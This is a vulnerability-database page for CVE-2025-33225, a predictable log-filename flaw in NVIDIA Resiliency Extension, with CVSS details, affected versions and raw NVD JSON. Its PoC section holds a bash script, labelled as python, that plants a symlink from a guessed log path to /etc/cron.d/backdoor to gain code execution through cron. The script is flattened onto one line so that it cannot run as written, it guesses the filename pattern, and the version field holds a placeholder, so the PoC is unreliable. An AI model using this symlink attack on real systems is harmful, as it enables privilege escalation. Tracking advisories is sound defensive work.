Security Vulnerability Report
中文
CVE-2025-33225 CVSS 8.4 HIGH

CVE-2025-33225

Published: 2025-12-16 18:16:12
Last Modified: 2026-02-02 16:14:58

Description

NVIDIA Resiliency Extension for Linux contains a vulnerability in log aggregation, where an attacker could cause predictable log-file names. A successful exploit of this vulnerability may lead to escalation of privileges, code execution, denial of service, information disclosure, and data tampering.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nvidia:nvidia_resiliency_extension:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nvidia:nvidia_resiliency_extension:0.5.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nvidia:nvidia_resiliency_extension:0.5.0:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nvidia:nvidia_resiliency_extension:0.5.0:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:nvidia:nvidia_resiliency_extension:0.5.0:rc4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
NVIDIA Resiliency Extension for Linux < 特定修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2025-33225 PoC - NVIDIA Resiliency Extension Log Aggregation Predictable Filename # This PoC demonstrates the predictable log filename vulnerability # Target: NVIDIA Resiliency Extension for Linux # Vulnerability: Predictable log file names in log aggregation TARGET_DIR="/var/log/nvidia-resiliency" PREDICTED_LOG_PATTERN="nvidia_resiliency_*.log" # Step 1: Identify the log file naming pattern echo "[*] Analyzing NVIDIA Resiliency Extension log file naming pattern..." ls -la "$TARGET_DIR" 2>/dev/null | grep -E "nvidia_resiliency.*\.log" # Step 2: Extract the naming pattern (timestamp-based or sequential) echo "[*] Extracting filename pattern..." for logfile in "$TARGET_DIR"/nvidia_resiliency_*.log; do if [ -f "$logfile" ]; then basename "$logfile" # Analyze pattern: timestamp, PID, or counter echo "[+] Found pattern analysis for: $(basename "$logfile")" fi done # Step 3: Create symlink attack to demonstrate exploitation echo "[*] Creating symlink attack vector..." MALICIOUS_TARGET="/etc/cron.d/backdoor" FAKE_LOG_PATH="$TARGET_DIR/nvidia_resiliency_$(date +%Y%m%d%H%M%S).log" # Create symlink from predictable log name to sensitive file if [ -d "$TARGET_DIR" ]; then ln -sf "$MALICIOUS_TARGET" "$FAKE_LOG_PATH" 2>/dev/null echo "[+] Symlink created: $FAKE_LOG_PATH -> $MALICIOUS_TARGET" fi echo "[*] PoC completed. If NVIDIA Resiliency Extension writes to the predicted filename," echo "[*] content could be written to $MALICIOUS_TARGET" echo "[!] This requires local access and specific timing based on log rotation."

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33225", "sourceIdentifier": "[email protected]", "published": "2025-12-16T18:16:11.503", "lastModified": "2026-02-02T16:14:58.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Resiliency Extension for Linux contains a vulnerability in log aggregation, where an attacker could cause predictable log-file names. A successful exploit of this vulnerability may lead to escalation of privileges, code execution, denial of service, information disclosure, and data tampering."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-61"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:nvidia_resiliency_extension:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.5.0", "matchCriteriaId": "599205EE-0CA2-4967-9E58-33542E770971"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:nvidia_resiliency_extension:0.5.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "3C75C685-20D5-42F4-97C7-4EC12EB97A3F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:nvidia_resiliency_extension:0.5.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "9E2180BD-9203-4397-AC3F-C4C9F6CB7D6C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:nvidia_resiliency_extension:0.5.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "7DAC5730-DD21-46D3-8196-111C2B7C23D7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:nvidia_resiliency_extension:0.5.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "2B787F3D-66B8-4051-A083-0CFB6C13981F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:nvidia_resiliency_extension:0.5.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "23D9651E-A413-4B12-B890-2E9F4BB883F8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:nvidia_resiliency_extension:0.5.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "B3AC20DD-3A69-4D6F-87D3-25C9D60EFB4B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:nvidia_resiliency_extension:0.5.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "9A6086F3-8A4B-4A74-A0AD-53E497E49146"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:nvidia_resiliency_extension:0.5.0:rc8:*:*:*:*:*:*", "matchCriteriaId": "215A794B-2F41-402D-A2A9-F64A4E742F50"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33225", "source": "[email protected]", "tags": ["US Government Resource", "VDB Entry"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5746", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33225", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}